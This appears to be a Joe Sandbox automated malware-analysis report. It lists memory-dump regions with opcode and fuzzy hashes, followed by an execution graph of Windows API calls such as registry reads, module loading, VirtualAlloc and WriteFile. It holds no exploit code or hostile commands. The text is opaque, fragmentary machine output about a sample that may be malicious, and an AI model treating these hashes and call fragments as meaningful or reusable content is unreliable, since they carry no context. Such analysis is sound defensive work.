                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1b4d3b6234dc084634634af1bd57fc65c9d1e3373e27b9fe04a030af04f23a06
                                                                                                              • Instruction ID: 01d931eb88d46a126d4d9fdb2150db97457c542f9f9f9bc561bb0b159f392b39
                                                                                                              • Opcode Fuzzy Hash: 1b4d3b6234dc084634634af1bd57fc65c9d1e3373e27b9fe04a030af04f23a06
                                                                                                              • Instruction Fuzzy Hash: F4018B343007118FD724EF15D484A9EBBE6EF84215300C969D85ACB715DF74ED06CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8bf1b8f993f44b16df1257ce68187e6e80dc07dc4d729a02c1aa1b32ad866cd9
                                                                                                              • Instruction ID: 4b73f5d0c94733cd269c8493a2de70278f881cb82a74f8890902ed20d64ca648
                                                                                                              • Opcode Fuzzy Hash: 8bf1b8f993f44b16df1257ce68187e6e80dc07dc4d729a02c1aa1b32ad866cd9
                                                                                                              • Instruction Fuzzy Hash: A9F0FC72E101089BDF19EBB4C454AEFBFB65F44300F05C56AD502E7244DE75550787D2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 34d24ac9983c364883e93091799e00e0bd031d029901c385386202da3789d62e
                                                                                                              • Instruction ID: 881e2ede24e2c79864b6b2ab37bd4489be4897eb1f71c40399f5b08b3f6d71c2
                                                                                                              • Opcode Fuzzy Hash: 34d24ac9983c364883e93091799e00e0bd031d029901c385386202da3789d62e
                                                                                                              • Instruction Fuzzy Hash: D5F06231B043505FD3559B6898908AABFF6EFC922131485BEE445CB396CE759C06C750
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ac60cfae94a75c7ac99eb058b20bc9bcd5199ae533f1b63d67fb424151666f84
                                                                                                              • Instruction ID: 943722a403be8725fe6451ba5c56c2bc6a3fabd7bf6a600810cdeb8613f307fa
                                                                                                              • Opcode Fuzzy Hash: ac60cfae94a75c7ac99eb058b20bc9bcd5199ae533f1b63d67fb424151666f84
                                                                                                              • Instruction Fuzzy Hash: CB01AD78904348AFC745FBB4E88079D7FB5AF09200B508AAAC450DF259EB306E0ACF81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4f867dca40f62b98426f4a87ec6dabce69274a99cdaa73aca337fd064e27174a
                                                                                                              • Instruction ID: d7a3c9b19626366638baa5187ac2fe7d368b1f35fd80dfa85c15333ac5126b14
                                                                                                              • Opcode Fuzzy Hash: 4f867dca40f62b98426f4a87ec6dabce69274a99cdaa73aca337fd064e27174a
                                                                                                              • Instruction Fuzzy Hash: 15F05E31704150AFC714EB7DD8589AB7BE9EFCE61031544AEF049CB265D971DC028BA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2b01ca2b9759fede1be62375c140566151a36082994897d93eb8087de2e064ff
                                                                                                              • Instruction ID: 7d7f28b8da4c695d6ae06d5eee0c6b0d4c74e08ef2e9ac4be7613bc6082e2790
                                                                                                              • Opcode Fuzzy Hash: 2b01ca2b9759fede1be62375c140566151a36082994897d93eb8087de2e064ff
                                                                                                              • Instruction Fuzzy Hash: 91F0B431B407011BD724A736D810B6F766BEFC0251F548A2CE4064F294DD70BD4B47D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8938c58d5caa1b8f4edfea5293ea6d682ec597365185563b55e33c5f4b2b6901
                                                                                                              • Instruction ID: 7d659269d5fcaa5655a002bb4d244a61f33eb4c6d756dd0ff06b0096937cb25a
                                                                                                              • Opcode Fuzzy Hash: 8938c58d5caa1b8f4edfea5293ea6d682ec597365185563b55e33c5f4b2b6901
                                                                                                              • Instruction Fuzzy Hash: 95F09031B407011BD724A736A860ABF6B67EFC0251F548A2CE4468F294DD71AD4B47D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1799773151.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10ad000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 47b2e0429e49c8d584dac0363557868742d5de6da61b2f06e8ff58193e2adcf3
                                                                                                              • Instruction ID: bfd82efe5b835c56ebab776f33cfb2a7bf5771fbab49672922f99f54916823f5
                                                                                                              • Opcode Fuzzy Hash: 47b2e0429e49c8d584dac0363557868742d5de6da61b2f06e8ff58193e2adcf3
                                                                                                              • Instruction Fuzzy Hash: 0BF0C2714043449EE7508E59C884B62FFD8EB40334F18C59AED4C1B287C2789840CB71
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aa2b21a7fd48b5484783c6a3a08349e4007e8c61bf5cc70ffad5517d2ab16ffa
                                                                                                              • Instruction ID: 695f17a12e47030869663d073ae94b64f92b0b46b7479de708090c5367441748
                                                                                                              • Opcode Fuzzy Hash: aa2b21a7fd48b5484783c6a3a08349e4007e8c61bf5cc70ffad5517d2ab16ffa
                                                                                                              • Instruction Fuzzy Hash: BAF09672E102059BEB199B64C459BEFBFB65F84300F45892AD402B7284DF7595068682
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aaf713ac476b8af519285b0024941eb11d8832745a2fbfbe697c98f9e60111d5
                                                                                                              • Instruction ID: 4cea88b85207c942a320916b5d0e86cb7ad88da3c5f8c5ac61c6a8c9e0208bbc
                                                                                                              • Opcode Fuzzy Hash: aaf713ac476b8af519285b0024941eb11d8832745a2fbfbe697c98f9e60111d5
                                                                                                              • Instruction Fuzzy Hash: B4F06232D106499BDB1AAB64C464AEFBFB29F84310F15C92AD402B7294DF70590AC6D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4ec8b9b61a605b794f64c7514c06bedbeb0d813a85a6f3678f8777d6177c18ca
                                                                                                              • Instruction ID: e65fbbb2caf0cc493a386dc36891dc0c222037ab2cb4de98433cc905f3c2425a
                                                                                                              • Opcode Fuzzy Hash: 4ec8b9b61a605b794f64c7514c06bedbeb0d813a85a6f3678f8777d6177c18ca
                                                                                                              • Instruction Fuzzy Hash: 19F09031E102089BDB199A74C865AEFBFB29B88300F11852A9443B7290DE719907CA81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2844200137a995170b7e8e8336b11d11fd94c6444e13135b188de6783043784e
                                                                                                              • Instruction ID: f72620436665aaa0669cb31f1d9bca3845c758b675ab3f84fbc1e0c96e8a5bcc
                                                                                                              • Opcode Fuzzy Hash: 2844200137a995170b7e8e8336b11d11fd94c6444e13135b188de6783043784e
                                                                                                              • Instruction Fuzzy Hash: 99017C74E013499FE719EF64E594BAD7BF2AF48304F248095E420AB355DB71AD44CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f11edcba5cce9d397fd44def57204bd32dc911c6a3dbe34da1faf7a83ab02572
                                                                                                              • Instruction ID: b345820bd294af82e58030e88543dfa053a77fe97d950388d7d4480d4b5b653b
                                                                                                              • Opcode Fuzzy Hash: f11edcba5cce9d397fd44def57204bd32dc911c6a3dbe34da1faf7a83ab02572
                                                                                                              • Instruction Fuzzy Hash: B3D05E32A0020DEFCB50EFE8EA4099EB7F9EB45200B1045A8D448DB204EA312F00DB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a62c250c1426c054b11ca520f443492317c46584bfb7316cc86cf820508890ee
                                                                                                              • Instruction ID: eef65eee04ad5ccc650422ab950be9016b3929609a87b506c364cea745f7e20e
                                                                                                              • Opcode Fuzzy Hash: a62c250c1426c054b11ca520f443492317c46584bfb7316cc86cf820508890ee
                                                                                                              • Instruction Fuzzy Hash: 73D05B70D0120DEFCB40EFA5D90195D77F9EB49200B1046ADD409D7200EE312F009B81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a565b8e826817d1535983305bd293477c877216b2b44e9e0f488a3110cb30117
                                                                                                              • Instruction ID: 767241acb90fa6257bf2d81a64850b662e3cc8a30b51e8bc1d762d307a7eefcf
                                                                                                              • Opcode Fuzzy Hash: a565b8e826817d1535983305bd293477c877216b2b44e9e0f488a3110cb30117
                                                                                                              • Instruction Fuzzy Hash: A9D022366001028FEA18A7A4F0841ECB330FB881157308661E20941104DB3A0B2B4B80
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 98960bca2b28528d375fdc547435f9570d62c2cc0be30c6cbaffa5817b6776b3
                                                                                                              • Instruction ID: 66e9e3ffbd6d0cf8fe5b35ae8dc3ee7564df8628c24d700f891869adec5f6e6d
                                                                                                              • Opcode Fuzzy Hash: 98960bca2b28528d375fdc547435f9570d62c2cc0be30c6cbaffa5817b6776b3
                                                                                                              • Instruction Fuzzy Hash: 9DD02236B103168B9E0CBB64F4400DCB320FB845293108222D91913304CF365B268FC2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 596a82186aed25075cf472fbffa83c942fd8efa45e04896e938b5890a54569ee
                                                                                                              • Instruction ID: 1c929d6194f56d79ed060ca721af7dc14eabf2448eb106d5961069b036d193a3
                                                                                                              • Opcode Fuzzy Hash: 596a82186aed25075cf472fbffa83c942fd8efa45e04896e938b5890a54569ee
                                                                                                              • Instruction Fuzzy Hash: 4AD0C93120A3808FD30A4A3684185697F65AF82149B5E80EFD0868E1A3D62AC856DB21
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6596e269d0c12d4ece7b793381db8f403252e1277d9e152a13ca8b8cc9da54d0
                                                                                                              • Instruction ID: 5242d3e9f9a3b46040503c4a546446b71b42f797c7baeb473539a2af2808c80a
                                                                                                              • Opcode Fuzzy Hash: 6596e269d0c12d4ece7b793381db8f403252e1277d9e152a13ca8b8cc9da54d0
                                                                                                              • Instruction Fuzzy Hash: 56D0C938340204CFC718AB68D05881573BABB8C60531008A8E50A8B375DA32EC01CA50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9d3d11fdaa20ca86e548805157b9a48cce506c25fb8b84f1e6ba4bd66e2e2670
                                                                                                              • Instruction ID: 5d386512262b67e64094ca17bb25dfd7a6927a57da62bc496bcb65831d2e78e0
                                                                                                              • Opcode Fuzzy Hash: 9d3d11fdaa20ca86e548805157b9a48cce506c25fb8b84f1e6ba4bd66e2e2670
                                                                                                              • Instruction Fuzzy Hash: 0AD09238340601CFCB29AB34D1A98A57BB6EF9921531509ECE44ACB76ADA329C02CB10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 32d236fdb07bc3b6d09bf0e29a438422061dd241ee9e9cf1502a413d35060054
                                                                                                              • Instruction ID: f36e784dfae542aae232de4df97b1a3a25571323dccfcd9dffe7da827b55c392
                                                                                                              • Opcode Fuzzy Hash: 32d236fdb07bc3b6d09bf0e29a438422061dd241ee9e9cf1502a413d35060054
                                                                                                              • Instruction Fuzzy Hash: 1ED0CA3041A384AFDB128BA8D4944883FB0EE1722432485DBE889DA06BC226A918CB02
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8c3716bf0bf348f1cee99fb10ca7f8a7b7acec92b2c208c91d37b32d0647c3db
                                                                                                              • Instruction ID: ecf12740a7b3424252f124ed1750f6ad38aeb781951f2eb2377f89cebc187a50
                                                                                                              • Opcode Fuzzy Hash: 8c3716bf0bf348f1cee99fb10ca7f8a7b7acec92b2c208c91d37b32d0647c3db
                                                                                                              • Instruction Fuzzy Hash: 84C002341542459FDB11BBA0E845B443BBEBB45704F244C90E1418B168C6A65C11DF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 951c14d093d66355c334812088d38c29f0f68de806a575a079e8268d6b9ae436
                                                                                                              • Instruction ID: 9f6bcb47aa68e890048a06e3506536dc0524151981982c2045cd1dc37c5a9700
                                                                                                              • Opcode Fuzzy Hash: 951c14d093d66355c334812088d38c29f0f68de806a575a079e8268d6b9ae436
                                                                                                              • Instruction Fuzzy Hash: CFB09237A00019968B04D699E4404ECBB30DA94232F044032C20062000862015AA8662
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d09e828a3d4795ffde4d008c0296c6234dff478b6c1e9a4f2fa1cacfb51ad244
                                                                                                              • Instruction ID: 81af600009ca5db0f23e262fed126f238f477388780a15137a2c385fe24c8b39
                                                                                                              • Opcode Fuzzy Hash: d09e828a3d4795ffde4d008c0296c6234dff478b6c1e9a4f2fa1cacfb51ad244
                                                                                                              • Instruction Fuzzy Hash: 23900231044A1CCF8950279579495957B5CD9585157800051B54E955065A5A65104696
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: \Vl
                                                                                                              • API String ID: 0-682378881
                                                                                                              • Opcode ID: 44128256b6b920fef92674cf20234db711353d8c460497ecb61cb9a0142ff431
                                                                                                              • Instruction ID: d4f2a07d76205bd4f87ae1d7b806cb33ac7cd920e500cff5619497f5d4197d88
                                                                                                              • Opcode Fuzzy Hash: 44128256b6b920fef92674cf20234db711353d8c460497ecb61cb9a0142ff431
                                                                                                              • Instruction Fuzzy Hash: 18B13B70E002198FDF28DFA9D8857DDBBF2AF88314F14C529E815A7294EB749846CF91
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: \Vl
                                                                                                              • API String ID: 0-682378881
                                                                                                              • Opcode ID: 033748b6aa794eafb18e0bb47b483aba2945e6a6b0a4d946e58f8ccb8a7bbddc
                                                                                                              • Instruction ID: b67f48dcb2d338ae122d4db79d991dc4b67b210ce550ee038f31bcc78c034acc
                                                                                                              • Opcode Fuzzy Hash: 033748b6aa794eafb18e0bb47b483aba2945e6a6b0a4d946e58f8ccb8a7bbddc
                                                                                                              • Instruction Fuzzy Hash: EA916C70E003099FDF28DFA9E99179DBBF2AF89314F14C529E815AB294DB749841CF81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8eaa3384df80cfdc3021c2891d3abc38bb6dd224d1bde00d47ec65cdbf301f59
                                                                                                              • Instruction ID: 0c55ef3ec1a1434d3388a1ff56b4176351ad0e2dc17db29a83e16f0a94cccd53
                                                                                                              • Opcode Fuzzy Hash: 8eaa3384df80cfdc3021c2891d3abc38bb6dd224d1bde00d47ec65cdbf301f59
                                                                                                              • Instruction Fuzzy Hash: E2B15E70E01609CFDB28EFA9D88579DBFF2AF89314F14C529D815A7294EB749841CF81

Execution Graph

Execution Coverage: 7.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 8.6%
Total number of Nodes: 2000
Total number of Limit Nodes: 42
21475->21480 21476->21479 21481 4031b4 VirtualFree 21477->21481 21482 403158 21477->21482 21478->21467 21479->21405 21480->21475 21480->21479 21481->21405 21482->21405 21484 402a4e 21483->21484 21485 402a11 21483->21485 21484->21447 21485->21484 21486 402a1c Sleep 21485->21486 21487 402a31 21486->21487 21487->21484 21488 402a35 Sleep 21487->21488 21488->21485 21493 402924 21489->21493 21491 402998 VirtualAlloc 21492 4029af 21491->21492 21492->21462 21494 4028c4 21493->21494 21494->21491 21495 40f6c0 WriteFile 21496 40f6dd 21495->21496 21497 4046c0 21498 4046d0 WriteFile 21497->21498 21500 4046cc 21497->21500 21499 4046e8 GetLastError 21498->21499 21498->21500 21499->21500 21501 4083b0 21502 4083c0 GetModuleFileNameW 21501->21502 21504 4083dc 21501->21504 21505 40920c GetModuleFileNameW 21502->21505 21506 40925a 21505->21506 21511 40941c 21506->21511 21508 409286 21509 409298 LoadLibraryExW 21508->21509 21510 4092a0 21508->21510 21509->21510 21510->21504 21512 409455 21511->21512 21533 406bf0 21512->21533 21514 40947d 21515 40948f lstrcpynW lstrlenW 21514->21515 21516 4094b9 21515->21516 21518 40952a 21516->21518 21554 408f6c 21516->21554 21518->21508 21519 409515 21520 40951e 21519->21520 21521 40952f GetUserDefaultUILanguage 21519->21521 21522 409310 3 API calls 21520->21522 21578 408c28 EnterCriticalSection 21521->21578 21522->21518 21524 409540 21601 409310 21524->21601 21526 40954b 21527 409577 21526->21527 21528 40955b GetSystemDefaultUILanguage 21526->21528 21527->21518 21606 4093c0 GetUserDefaultUILanguage GetLocaleInfoW 21527->21606 21529 408c28 33 API calls 21528->21529 21531 40956c 21529->21531 21532 409310 3 API calls 21531->21532 21532->21527 21534 406bf4 21533->21534 21537 406c10 21533->21537 21534->21533 21536 406c00 21534->21536 21540 40716f 21534->21540 21541 4070b0 21534->21541 21535 406c40 21535->21514 21536->21537 21611 407504 21536->21611 21537->21535 21616 4041cc 14 API calls 21537->21616 21541->21540 21542 406bf0 15 API calls 21541->21542 
21544 4070c3 21541->21544 21542->21544 21543 40710c 21543->21540 21547 407504 14 API calls 21543->21547 21546 4070ee 21544->21546 21617 406504 15 API calls 21544->21617 21546->21543 21618 406504 15 API calls 21546->21618 21550 407122 21547->21550 21549 40715a 21552 406bf0 15 API calls 21549->21552 21550->21549 21619 406368 14 API calls 21550->21619 21553 40716b 21552->21553 21553->21514 21555 408f83 21554->21555 21556 408f97 GetModuleFileNameW 21555->21556 21557 408fac 21555->21557 21558 408fc6 21556->21558 21559 408fb9 lstrcpynW 21557->21559 21560 408fd4 RegOpenKeyExW 21558->21560 21567 40913b 21558->21567 21559->21558 21561 409055 21560->21561 21562 408ff7 RegOpenKeyExW 21560->21562 21629 408d70 12 API calls 21561->21629 21562->21561 21563 409015 RegOpenKeyExW 21562->21563 21563->21561 21565 409033 RegOpenKeyExW 21563->21565 21565->21561 21565->21567 21566 409073 RegQueryValueExW 21568 409091 21566->21568 21569 4090c4 RegQueryValueExW 21566->21569 21567->21519 21572 4041b0 14 API calls 21568->21572 21570 4090e0 21569->21570 21571 4090c2 21569->21571 21573 4041b0 14 API calls 21570->21573 21575 40912a RegCloseKey 21571->21575 21630 4041cc 14 API calls 21571->21630 21574 409099 RegQueryValueExW 21572->21574 21576 4090e8 RegQueryValueExW 21573->21576 21574->21571 21575->21519 21576->21571 21579 408c74 LeaveCriticalSection 21578->21579 21580 408c54 21578->21580 21581 406bf0 15 API calls 21579->21581 21582 408c65 LeaveCriticalSection 21580->21582 21583 408c87 IsValidLocale 21581->21583 21592 408d17 21582->21592 21584 408ce5 EnterCriticalSection 21583->21584 21585 408c96 21583->21585 21671 406c7c 21584->21671 21587 408caa 21585->21587 21588 408c9f 21585->21588 21632 408908 18 API calls 21587->21632 21631 408b08 20 API calls 21588->21631 21592->21524 21593 408cb3 GetSystemDefaultUILanguage 21593->21584 21595 408cbd 21593->21595 21594 408ca8 21594->21584 21596 408cce GetSystemDefaultUILanguage 21595->21596 21633 406fe0 21595->21633 21670 408908 18 API calls 21596->21670 
21599 408cdb 21600 406fe0 15 API calls 21599->21600 21600->21584 21602 409324 21601->21602 21603 409393 21602->21603 21604 409365 lstrcpynW 21602->21604 21603->21526 21700 4092d8 FindFirstFileW 21604->21700 21607 4092d8 2 API calls 21606->21607 21608 4093f3 21607->21608 21609 4092d8 2 API calls 21608->21609 21610 409410 21608->21610 21609->21610 21610->21518 21612 40753d 21611->21612 21613 407508 21611->21613 21612->21537 21613->21612 21620 4041b0 21613->21620 21615 407517 21615->21537 21616->21535 21617->21546 21618->21543 21619->21549 21622 4041b4 21620->21622 21621 4042c5 21628 404294 10 API calls 21621->21628 21622->21615 21622->21621 21623 4041be 21622->21623 21627 40a264 14 API calls 21622->21627 21623->21615 21626 4042e6 21626->21615 21627->21621 21628->21626 21629->21566 21630->21575 21631->21594 21632->21593 21634 406fe8 21633->21634 21644 407099 21633->21644 21635 406ff2 21634->21635 21647 406bf0 21634->21647 21637 407069 21635->21637 21638 406ffd 21635->21638 21636 406c10 21639 406c40 21636->21639 21673 4041cc 14 API calls 21636->21673 21645 407079 21637->21645 21693 406504 15 API calls 21637->21693 21649 407009 21638->21649 21674 406504 15 API calls 21638->21674 21639->21596 21640 406c00 21640->21636 21648 407504 14 API calls 21640->21648 21642 407029 21642->21644 21676 406f48 21642->21676 21644->21596 21645->21644 21646 406f48 15 API calls 21645->21646 21655 407045 21646->21655 21647->21636 21647->21640 21652 40716f 21647->21652 21653 4070b0 21647->21653 21648->21636 21649->21642 21675 406504 15 API calls 21649->21675 21653->21652 21657 406bf0 15 API calls 21653->21657 21660 4070c3 21653->21660 21656 407064 21655->21656 21689 406344 21655->21689 21656->21596 21657->21660 21658 40710c 21658->21652 21663 407504 14 API calls 21658->21663 21662 4070ee 21660->21662 21694 406504 15 API calls 21660->21694 21662->21658 21695 406504 15 API calls 21662->21695 21665 407122 21663->21665 21666 40715a 21665->21666 21696 406368 14 API calls 21665->21696 21668 406bf0 
